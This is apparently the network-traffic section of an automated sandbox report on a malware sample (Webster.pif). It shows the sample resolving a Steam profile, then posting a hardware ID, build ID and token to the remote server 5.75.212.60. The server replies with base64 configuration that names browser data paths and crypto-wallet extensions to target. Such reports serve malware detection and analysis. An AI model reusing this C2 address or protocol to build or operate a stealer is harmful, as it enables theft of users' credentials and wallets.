                                                                                Jul 26, 2024 17:55:01.762192965 CEST64188443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:55:01.762206078 CEST443641885.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:55:01.762212038 CEST64188443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:55:01.762213945 CEST443641885.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:55:01.762332916 CEST64188443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:55:01.762358904 CEST443641885.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:55:01.762470007 CEST64188443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:55:01.762777090 CEST443641885.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:55:01.762895107 CEST64188443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:55:01.762909889 CEST443641885.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:55:01.762923002 CEST64188443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:55:01.762931108 CEST443641885.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:55:01.762940884 CEST64188443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:55:01.762943983 CEST443641885.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:55:03.003818989 CEST443641885.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:55:03.003954887 CEST64188443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:55:03.003983974 CEST443641885.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:55:03.004023075 CEST443641885.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:55:03.004038095 CEST64188443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:55:03.004077911 CEST64188443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:55:03.004272938 CEST64188443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:55:03.004291058 CEST443641885.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:55:03.043128014 CEST64189443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:55:03.043189049 CEST443641895.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:55:03.043272018 CEST64189443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:55:03.043493032 CEST64189443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:55:03.043515921 CEST443641895.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:55:03.839098930 CEST443641895.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:55:03.839324951 CEST64189443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:55:03.839905977 CEST64189443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:55:03.839924097 CEST443641895.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:55:03.842294931 CEST64189443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:55:03.842315912 CEST443641895.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:55:04.514873981 CEST443641895.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:55:04.514961004 CEST443641895.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:55:04.515116930 CEST64189443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:55:04.515351057 CEST64189443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:55:04.515366077 CEST443641895.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:55:04.516985893 CEST64190443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:55:04.517083883 CEST443641905.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:55:04.517393112 CEST64190443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:55:04.517688990 CEST64190443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:55:04.517721891 CEST443641905.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:55:05.454972029 CEST443641905.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:55:05.455054045 CEST64190443192.168.2.65.75.212.60

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Jul 26, 2024 17:53:06.393099070 CEST5393353192.168.2.61.1.1.1
                                                                                Jul 26, 2024 17:53:06.403953075 CEST53539331.1.1.1192.168.2.6
                                                                                Jul 26, 2024 17:53:37.049578905 CEST5365149162.159.36.2192.168.2.6
                                                                                Jul 26, 2024 17:53:37.534704924 CEST6395853192.168.2.61.1.1.1
                                                                                Jul 26, 2024 17:53:37.546936035 CEST53639581.1.1.1192.168.2.6
                                                                                Jul 26, 2024 17:53:39.512348890 CEST5036553192.168.2.61.1.1.1
                                                                                Jul 26, 2024 17:53:39.535487890 CEST53503651.1.1.1192.168.2.6
                                                                                Jul 26, 2024 17:54:22.492189884 CEST5869153192.168.2.61.1.1.1
                                                                                Jul 26, 2024 17:54:22.524728060 CEST53586911.1.1.1192.168.2.6

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Jul 26, 2024 17:53:06.393099070 CEST192.168.2.61.1.1.10x9ddeStandard query (0)FGQNrbtYCvA.FGQNrbtYCvAA (IP address)IN (0x0001)false
                                                                                Jul 26, 2024 17:53:37.534704924 CEST192.168.2.61.1.1.10xf98eStandard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                Jul 26, 2024 17:53:39.512348890 CEST192.168.2.61.1.1.10x5c98Standard query (0)86.23.85.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                Jul 26, 2024 17:54:22.492189884 CEST192.168.2.61.1.1.10x4da0Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Jul 26, 2024 17:53:06.403953075 CEST1.1.1.1192.168.2.60x9ddeName error (3)FGQNrbtYCvA.FGQNrbtYCvAnonenoneA (IP address)IN (0x0001)false
                                                                                Jul 26, 2024 17:53:37.546936035 CEST1.1.1.1192.168.2.60xf98eName error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                Jul 26, 2024 17:53:39.535487890 CEST1.1.1.1192.168.2.60x5c98Name error (3)86.23.85.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                Jul 26, 2024 17:54:22.524728060 CEST1.1.1.1192.168.2.60x4da0No error (0)steamcommunity.com23.197.127.21A (IP address)IN (0x0001)false

                                                                                HTTP Request Dependency Graph

                                                                                • steamcommunity.com
                                                                                • 5.75.212.60

                                                                                HTTPS Proxied Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.66416723.197.127.214435740C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-26 15:54:23 UTC119OUTGET /profiles/76561199747278259 HTTP/1.1
                                                                                Host: steamcommunity.com
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:54:23 UTC1870INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                Cache-Control: no-cache
                                                                                Date: Fri, 26 Jul 2024 15:54:23 GMT
                                                                                Content-Length: 34725
                                                                                Connection: close
                                                                                Set-Cookie: sessionid=a8463345d80d003bbc0ed922; Path=/; Secure; SameSite=None
                                                                                Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                2024-07-26 15:54:23 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                2024-07-26 15:54:23 UTC10062INData Raw: 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e
                                                                                Data Ascii: enDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="n
                                                                                2024-07-26 15:54:24 UTC10149INData Raw: 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 61 73 73 65 74 73 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45 44 5f 55 52 4c 26 71 75 6f
                                                                                Data Ascii: kamai.steamstatic.com\/&quot;,&quot;COMMUNITY_CDN_ASSET_URL&quot;:&quot;https:\/\/cdn.akamai.steamstatic.com\/steamcommunity\/public\/assets\/&quot;,&quot;STORE_CDN_URL&quot;:&quot;https:\/\/store.akamai.steamstatic.com\/&quot;,&quot;PUBLIC_SHARED_URL&quo


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.6641685.75.212.604435740C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-26 15:54:24 UTC230OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:54:25 UTC158INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:25 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                2024-07-26 15:54:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.6641695.75.212.604435740C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-26 15:54:26 UTC322OUTPOST / HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----AEHDAKFIJJKKEBGDBAAK
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Content-Length: 279
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:54:26 UTC279OUTData Raw: 2d 2d 2d 2d 2d 2d 41 45 48 44 41 4b 46 49 4a 4a 4b 4b 45 42 47 44 42 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 34 31 46 33 38 31 33 30 43 38 30 31 31 32 38 30 35 36 36 34 38 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 44 41 4b 46 49 4a 4a 4b 4b 45 42 47 44 42 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d
                                                                                Data Ascii: ------AEHDAKFIJJKKEBGDBAAKContent-Disposition: form-data; name="hwid"241F38130C801128056648-a33c7340-61ca-11ee-8c18-806e6f6e6963------AEHDAKFIJJKKEBGDBAAKContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------
                                                                                2024-07-26 15:54:27 UTC158INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:27 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                2024-07-26 15:54:27 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 34 39 36 64 63 35 37 62 31 37 64 36 31 34 31 31 62 37 62 66 34 63 63 64 37 32 31 35 37 61 37 39 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 3a1|1|1|1|496dc57b17d61411b7bf4ccd72157a79|1|1|1|0|0|50000|10


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.6641705.75.212.604435740C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-26 15:54:28 UTC322OUTPOST / HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----KFIJJEGHDAEBGCAKJKFH
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Content-Length: 331
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:54:28 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 36 64 63 35 37 62 31 37 64 36 31 34 31 31 62 37 62 66 34 63 63 64 37 32 31 35 37 61 37 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 48 0d 0a 43 6f 6e 74
                                                                                Data Ascii: ------KFIJJEGHDAEBGCAKJKFHContent-Disposition: form-data; name="token"496dc57b17d61411b7bf4ccd72157a79------KFIJJEGHDAEBGCAKJKFHContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------KFIJJEGHDAEBGCAKJKFHCont
                                                                                2024-07-26 15:54:29 UTC158INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:28 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                2024-07-26 15:54:29 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.6641715.75.212.604435740C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-26 15:54:29 UTC322OUTPOST / HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----FBKFCFBFIDGCGDHJDBKF
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Content-Length: 331
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:54:29 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 36 64 63 35 37 62 31 37 64 36 31 34 31 31 62 37 62 66 34 63 63 64 37 32 31 35 37 61 37 39 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 0d 0a 43 6f 6e 74
                                                                                Data Ascii: ------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="token"496dc57b17d61411b7bf4ccd72157a79------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------FBKFCFBFIDGCGDHJDBKFCont
                                                                                2024-07-26 15:54:31 UTC158INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:31 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                2024-07-26 15:54:31 UTC5685INData Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                5192.168.2.6641725.75.212.604435740C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-26 15:54:32 UTC322OUTPOST / HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----GDHDAEBGCAAFIDGCGDHI
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Content-Length: 332
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:54:32 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 44 41 45 42 47 43 41 41 46 49 44 47 43 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 36 64 63 35 37 62 31 37 64 36 31 34 31 31 62 37 62 66 34 63 63 64 37 32 31 35 37 61 37 39 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 41 45 42 47 43 41 41 46 49 44 47 43 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 41 45 42 47 43 41 41 46 49 44 47 43 47 44 48 49 0d 0a 43 6f 6e 74
                                                                                Data Ascii: ------GDHDAEBGCAAFIDGCGDHIContent-Disposition: form-data; name="token"496dc57b17d61411b7bf4ccd72157a79------GDHDAEBGCAAFIDGCGDHIContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------GDHDAEBGCAAFIDGCGDHICont
                                                                                2024-07-26 15:54:32 UTC158INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:32 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                2024-07-26 15:54:32 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                6192.168.2.6641735.75.212.604435740C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-26 15:54:34 UTC323OUTPOST / HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----DAECGCGHCGHCAKECBKJK
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Content-Length: 5105
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
